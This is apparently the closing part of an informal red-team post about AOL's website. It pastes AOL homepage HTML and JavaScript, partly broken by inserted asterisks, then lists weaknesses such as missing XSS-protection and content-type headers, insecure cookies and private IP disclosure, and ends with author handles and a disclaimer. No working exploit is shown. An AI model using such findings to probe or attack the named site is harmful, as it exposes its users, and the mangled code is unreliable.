F[k].h=function(a,b){return a.a?null!=a.a(b):null!=a[m](b)};F[k].v=function(){for(var a=e.getElementsByTagName(r),b=0;b<a.length;++b){var c=a[b];this.h(c,y)&&this.l(c)}};F[k].overrideAttributeFunctions=F[k].v;F[k].l=function(a){var b=this;this.h(a,x)||(a.k=a

[m],a.getAttribute=function(a){a.toLowerCase()==D&&b.h(this,y)&&(a=y);return this.k(a)},a.setAttribute(x,p))};
E.g=function(a,b,c){if(a.addEventListener)a.addEventListener(b,c,!1);else if(a.attachEvent)a.attachEvent(u+b,c);else{var h=a[u+b];a[u+b]=function(){c.call(this);h&&h.call(this)}}};E.t=function(a,b){var c=new F(b);E.lazyLoadImages=c;E.g(d,s,function(){c.c=!

0;c.b=a;c.a=200;c.f()});0!=b.indexOf(q)&&((new Image).src=b);var h=function(){if(!(c.c&&a||c.e)){var b=c.j;(new Date).getTime()-c.i>c.j&&(b=0);c.e=d.setTimeout(function(){c.i=(new Date).getTime();c.f();c.e=null},b)}};E.g(d,C,h);E.g(d,B,h)};
E.lazyLoadInit=E.t;})();

pagespeed.lazyLoadInit(false, "/mod_pagespeed_static/1.JiBnMqyl6S.gif");

//]]></script><img class="noion" pagespeed_lazy_src="http://portal.aolcdn.com/p5/forms/67023/xf5603f5b-bbc6-41bb-994d-91ca4e937f69.png.pagespeed.ic.q0cMAMNeSh.png" alt="Search" src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" 

onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/></a>
<b style="width: 49.0%;">
<a href="http://mail.aol.com/?icid=aol.com-nav" target="_blank" class="pausedl qnpos1 qn auth-0 mailpreview show-300 hide-300 thresh-500 mnid-qnav-mail_quick-nav-global plid-628891 lnid-sec1_lnk1" name="om_quicknav_mail_global" title='AOL Mail' 

id='mailpreview'><img alt="AOL Mail" class="noion" pagespeed_lazy_src="http://portal.aolcdn.com/p5/forms/67023/xf5603f5b-bbc6-41bb-994d-91ca4e937f69.png.pagespeed.ic.q0cMAMNeSh.png" src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" 

onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/><span></span></a>
<div id="mailoverw"><div id="mailover"></div></div><div class="tooltip"><div class="tooltip-arrow sprite-bg sprite-up-arrow-tooltip"></div><i>AOL Mail</i></div></b>
<b style="width: 49.0%;">
<i class="last"><a href="#" onclick="return false;" class=" qnpos3 mnid-qnav-quick-nav-menu_quick-nav-global plid-559357 lnid-sec1_lnk3 hasdropdown dropdown-quick-nav-menu-icons" name="om_quicknav_quick-nav-menu_global"><img alt="" class="noion" 

pagespeed_lazy_src="http://portal.aolcdn.com/p5/forms/67023/xf5603f5b-bbc6-41bb-994d-91ca4e937f69.png.pagespeed.ic.q0cMAMNeSh.png" src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/></a>
</i></b>
<a class="mobile-menu mnid-user-menu plid-559408"><img class="noion" pagespeed_lazy_src="http://portal.aolcdn.com/p5/forms/67023/xf5603f5b-bbc6-41bb-994d-91ca4e937f69.png.pagespeed.ic.q0cMAMNeSh.png" alt="Menu" 

src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/></a>
</div>
</div></div>
<div id="preview-container"></div></div></div>
<div id="aol-hnav">
<div class="mpid-7 ">
<div id="ghnav-wrapper" class="hnav_v2" data-group="">
<div id="ghnav1" class="mnid-hnav-2013-v2 plid-562160 format-light">
<ul class='topLevel'>
<li class='topLevel first'>
<div class='topTitle'><a id="ghnav-news" data-drawerslot="news" name="om_ghnav_sec1_link1" data-pos="1" class="itemLink icid-gnavbar_rootnews lnid-sec1_lnk1" href="/news/">News</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-sports" data-drawerslot="sports" name="om_ghnav_sec2_link1" data-pos="2" class="itemLink icid-gnavbar_rootsports lnid-sec2_lnk1" href="/sports/">Sports</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-entertainment" data-drawerslot="entertainment" name="om_ghnav_sec3_link1" data-pos="3" class="itemLink icid-gnavbar_rootentertainment lnid-sec3_lnk1" href="/entertainment/">Entertainment</a></div><div 

class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-lifestyle" data-drawerslot="lifestyle" name="om_ghnav_sec4_link1" data-pos="4" class="itemLink icid-gnavbar_living lnid-sec4_lnk1" href="/lifestyle/">Lifestyle</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-finance" data-drawerslot="finance" name="om_ghnav_sec5_link1" data-pos="5" class="itemLink icid-gnavbar_finance lnid-sec5_lnk1" href="/finance/">Finance</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-weather" name="om_ghnav_sec6_link1" data-pos="6" class="itemLink icid-gnavbar_weatherroot lnid-sec6_lnk1" href="http://weather.aol.com/">Weather</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-videos" name="om_ghnav_sec7_link1" data-pos="7" class="itemLink icid-gnavbar_rootvideo lnid-sec7_lnk1" href="http://features.aol.com/">Videos</a></div><div class='hnavdrawer'></div></li>
</ul>
<div class="ghnav-bg-top "></div>
<div class="ghnav-bg-sub "></div>
</div>
<div class="subnavControls dn " data-scrolldist="">
<div class="subnavcontroller"><span class="subnav-back sprite-bg sprite-grey-back-arrow-small bN"></span></div>
<div class="subnavcontroller"><span class="subnav-forward sprite-bg sprite-grey-forward-arrow-small bN"></span></div>
</div>
<span id="ghnavExtras" style="display:none;" class=" showDelay-600  hideDelay-400  stopDL-true "></span><div id="weather" class="wthrHnav light">
<div class="mpid-6 ">
<div class="weatherloc weatherloc-weather">
<div class="mnid-weather plid-500471">
<div class="locWrapper">
<a class="lnid-sec1_lnk3 weathersetloc" href="#" id="weatheredit">Set Location</a>
</div>
<span class="wthDvdr">|</span>
<a class="lnid-sec1_lnk2" href="http://weather.aol.com/main.adp?location=%locationId%" name="om_weatherforecast"><b class="wthr_ttl">Weather</b></a>
<a href="http://weather.aol.com/main.adp?location=%locationId%" class="lnid-sec1_lnk1" name="om_weathericon">
<!-- skyCode: 32 -->
<span title="Weather" class="icon-font-wthr icon-607" data-icon="&#xe607;"><span class="screen-reader-text">Weather</span></span>
<!--<img class="wthr_avatar" alt="Weather" title="Weather" src="http://portal.aolcdn.com/p5/_v116.7/css/whn/w32.png"/>-->
</a>
<div id="wthrChngLocDelay" class="dn">300</div>
<div class="ttip dn lnid-sec4_lnk1">
<div class="ttip-arw sprite-bg sprite-up-arrow-tooltip"></div>
<a href="#">Change Location</a>
</div>
<div class="chngLocTip"></div>
<script type="text/javascript" pagespeed_no_defer="">pagespeed.lazyLoadImages.overrideAttributeFunctions();</script><script type="text/javascript"></script></div>
</div></div>
</div>
<script type="text/javascript">var hnavDefaultHighlightLinkedText="today";</script>
</div></div>
</div>
<div id="aol-content" class="aol-content clearfix">
<div class="mlid-refresh-module">
<div class="mpid-1 resp-show1024 resp-hide">
<span id="pagerefresh-inactive" class="dn">1800,banner,pagerefresh-inactive-message</span></div>
</div>
<div id="col12_2">
<div class="mlid-dl_v2">
<script type="text/javascript">adSetInView('0');</script><div class="mpid-1 rfrsh rfrshs-dynamiclead rfrsho-false ">
<div id="dl_v2" class="wide typew dl_design_8 alternativeB fieldVersion8 " data-disableautoroate="">
<h2 class="hidden">Rotating Content</h2>
<a href="#" id="dlpBtnA" class="hidden" title="">Pause</a>
<div id="vdisplay-type" class="dn">:</div>
<div id="dlw">
<div id="dlwa">
<p id="dlSlt" class="dn">dynamiclead</p><i id="dlBtnTitle" class="dn">Pause Slideshow,Play Slideshow</i>
<span id="slduration" title="8000"></span>
<div class=" mnid-dl1 dtid-exclusiveStacked plid--289250805 dl-design-version-8 nonvideo-dl">
<span class="dn" id="dl-vslot">-289250805</span>
<a id="dlimg" data-orig-href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-flips-5-dead-140-injured/21182634/" name="om_dl1_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl1|sec1_lnk1&amp;pLid=-289250805" 

href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-flips-5-dead-140-injured/21182634/"><img height="504" data-credit="AP" alt="At least 6 dead after grisly Amtrak train accident" width="768" class="noion" pagespeed_lazy_src="http://dlug-

assets.grvcdn.com/15/38/6a/5a/f3/6c/37/53/f4/66/cc/ae/2c/3c/84/3b-118880845555531f7af1e8c4.28190042.jpg" src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/><span id='dl-gradient-lr' 

class='dn'></span><span id='dl-gradient-rl' class='dn'></span></a><span class="dl-copy-overlay">
<div class="main-section ">
<span class="category"><a class="lnid-sec6_lnk1 icid-maing-grid7|main5|dl1|sec6_lnk1&amp;pLid=-289250805" href="http://www.aol.com/news/">News</a></span>
<span class="source"><a name="om_dl1_src" class="lnid-sec6_lnk2 icid-maing-grid7|main5|dl1|sec6_lnk2&amp;pLid=-289250805" href="http://www.aol.com">AOL</a></span>
<h2 class="dl-headline"><a name="om_dl1_hdln" class="lnid-sec1_lnk2 icid-maing-grid7|main5|dl1|sec1_lnk2&amp;pLid=-289250805" href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-flips-5-dead-140-injured/21182634/">At least 6 dead after grisly 

Amtrak train accident</a></h2>
<p class="dlcopy">A New York-bound train derailed violently near Philadelphia late Tuesday, injuring dozens and leaving a mangled 'disastrous mess.'</p>
<p class="lede-link"><a name="om_dl1_cpy" class="lnid-sec1_lnk3 icid-maing-grid7|main5|dl1|sec1_lnk3&amp;pLid=-289250805" href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-flips-5-dead-140-injured/21182634/">Rescue crews still on the 

scene</a></p>
</div>
<div class="sublede-section">
<h3>Related coverage</h3>
<ul id="om_dl1_slde"><li class="first"><a name="om_dl1_slede1" class="dl-sublede-link bold  lnid-sec3_lnk3 icid-maing-grid7|main5|dl1|sec3_lnk3&amp;pLid=-289250805" href="http://www.aol.com/article/2015/05/13/the-latest-on-amtrak-crash-at-least-140-go-to-

hospitals/21182681/" dldesignversion="dl-design-version-8">At least 140 sent to hospitals</a></li>
<li class=""><a name="om_dl1_slede2" class="dl-sublede-link bold  lnid-sec3_lnk4 icid-maing-grid7|main5|dl1|sec3_lnk4&amp;pLid=-289250805" href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-in-philadelphia-killing-at-least-five/21182674/" 

dldesignversion="dl-design-version-8">Train's estimated speed before crash</a></li></ul>
</div>
</span>
</div>

<script> ************************************************************************************************************type="text/javascript" pagespeed_no_defer="">pagespeed.lazyLoadImages.overrideAttributeFunctions();</script><script type="text/javascript">var dlImps=new Array();dlImps["dl1"]=true;var dlact="";var dlduration=8000;var 

dloverrided=false;var dlresumeDuration=2000;var dlMobileDuration=-1;var dlcurr=1;var dltotal=40;var paramslot="dynamiclead";var dloffset=0;var ftmslot="dynamiclead-ftm";var ftmversion="3";var disableftm="true";var sitHot="";var vcslot="dynamiclead-video-

config";var vbclass="vid_over";var stcExpTime=1200000;var dlItems="-289250805,1888649732,231816128,0,-799765327,-1748183507,-964184370,-441235404,1033204758,-1974669079,1064691091,57938518,814987171,-1119011898,1056167863,535331767,1103484987,-

***************************************************************

1105093385,1257960754";var dlSegSource="1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1";var dlCollectionId="";var dlRotCookieFlag="1";var dlRotCookieVal="main5%2C1431524902720%2CdlStickyBustTs%2C1427811308000%2C1%2C-
*************************************************************************


289250805%2C1%2C1888649732%2C1%2C231816128%2C1%2C0%2C1%2C-799765327%2C1%2C-1748183507%2C1%2C-964184370%2C1%2C-441235404%2C1%2C1033204758%2C1%2C-1974669079%2C1%2C1064691091%2C1%2C57938518%2C1%2C814987171%2C1%2C-

1119011898%2C1%2C1056167863%2C1%2C535331767%2C1%2C1103484987%2C1%2C-849248534%2C1%2C-1802988545%2C1%2C781068958%2C1%2C435801538%2C1%2C-1585492377%2C1%2C-228869124%2C1%2C-193190208%2C1%2C1693120902%2C1%2C-

5156796%2C1%2C1177620977%2C1%2C-1854162544%2C1%2C867933819%2C1%2C-1936511377%2C1%2C1567684778%2C1%2C-375679735%2C1%2C-1494422192%2C1%2C1498332623%2C1%2C51317826%2C1%2C-1439026932%2C1%2C-96746587%2C1%2C-370339251%2C1%2C-

************************************************************************

1105093385%2C1%2C1257960754";var dlRotCookieName="dlugRotn";var dlEnableSwipe=false;var dlNewDesign=true;var dlDesignVersion="8";var dlSlideCountDivider=" | ";var dlPauseButtonText="Pause";var dlPlayButtonText="Play";var cobrand="main5";var 

ftmPlid="";var dlPauseOnTabOut="false";var enableCSBeaconGlb=true;var dlug="true";var dlugGDK="*****************http://i.api.grvcdn.com/gdk/gdk-0.2.2-bare.min.js";var 

***********dlugPlacement="1967";AOL.mobileDisableAutoRotate=true;AOL.tabletDisableAutoRotate=false;AOL.desktopDisableAutoRotate=false;</script> 

******************************************************************************

</div>and more
</div> and more, and more more but MOREEEE :-)







OTHER WEB DEVELOPMENT FAILS
***************************************




-Cookie Set WithOut Secure Flag (5)

-Incomplete Or Not Cche-Control Pragma HTTP Header Set

-Private IP Disclosure (4)

-Web Browser XSS Protection Not Enable (5967)

-X Content Type- Options Header Missing (6053)




V-Authors:
-----------


@Lord0fTheWar 

Red Teamer / @HabemusCurso Security Trainner Red Teamer 

Red Teams / Tiger Teams Trainer at http://habemuscurso.blogspot.com





VI- LEGAL NOTICES
--------------------------

The Authors accepts no responsibility for any damage caused by the use or misuse of this information.




Lord0fthewar Caio Caio ;) 
                                    |
                                   \|/
                                   \|/